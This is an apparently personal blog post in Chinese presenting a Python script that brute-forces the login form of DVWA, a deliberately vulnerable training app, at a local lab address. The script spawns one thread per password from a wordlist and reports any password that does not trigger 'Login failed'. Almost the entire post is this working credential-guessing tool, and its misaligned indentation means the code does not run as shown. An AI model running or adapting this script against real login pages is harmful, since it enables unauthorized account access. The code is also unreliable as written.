利用Requests模块暴力破解DVWA应用

import requests   #利用requests模块提交POST请求
import threading   #利用多线程加快破解速度
import os
import sys
import termcolor


class DwdaBruteforcer:
    def __init__(self, url, username, filename):

  """

  Args:

  url: web应用的URL,此处为用户登录页面URL

  username:登录web应用的用户名

  filename: 密码字典文件名称

  """
        self.username = username
        self.filename = filename
        self.url = url
    
    def login(self, password):

  #登录方法
        post_data = {
            'username': self.username,
            'password': password,
            'Login':'Login'
        }

  #通过分析DVWA登录页面的提交请求过程,可以得知请求参数分别为username, password, Login,以该三个参数作为字典的键构建post数据字典
        try:
            response = requests.post(url=self.url, data=post_data)
            if "Login failed" in response.text:
                pass

    #如果返回页面中含有"Login failed",则表示密码有误,登录不成果
            else:
                print(termcolor.colored('Password Found: %s' % password, 'blue'))
        except:
            pass


    def brute_forcer(self):
        with open(self.filename, 'r') as f:
            for password in f.readlines():
                password = password.strip().strip('\n')
                t = threading.Thread(target=self.login, args=(password,))   #利用多线程模块,加快破解速度
                t.start()


def main():
    banner = """
                ****************************

                  Web Brute Forcer By Jason

                ****************************
        """
    print(banner)
    username = input(termcolor.colored("Enter Username to Attack: ", 'blue'))# Specify username to login the web application
    if username is None:
        print("Enter username!")
        sys.exit()  #如果用户没有输入任何东西,则程序终止
    url = "http://192.168.140.137/dvwa/login.php" # Speicfy the path of web application
    filepath = input(termcolor.colored("Enter Path of Password Lists: ", 'blue')) # Speicfy the path of password list to crack the web application
    if not os.path.exists(filepath):
        print("The File Does Not Exist!")
        sys.exit()
    dwda = DwdaBruteforcer(url, username, filepath) # create instance of class dwda_bruteforcer
    dwda.brute_forcer()


if __name__ == "__main__":
    main()

posted @ 2022-03-23 22:33  Jason_huawen  阅读(56)  评论(0编辑  收藏  举报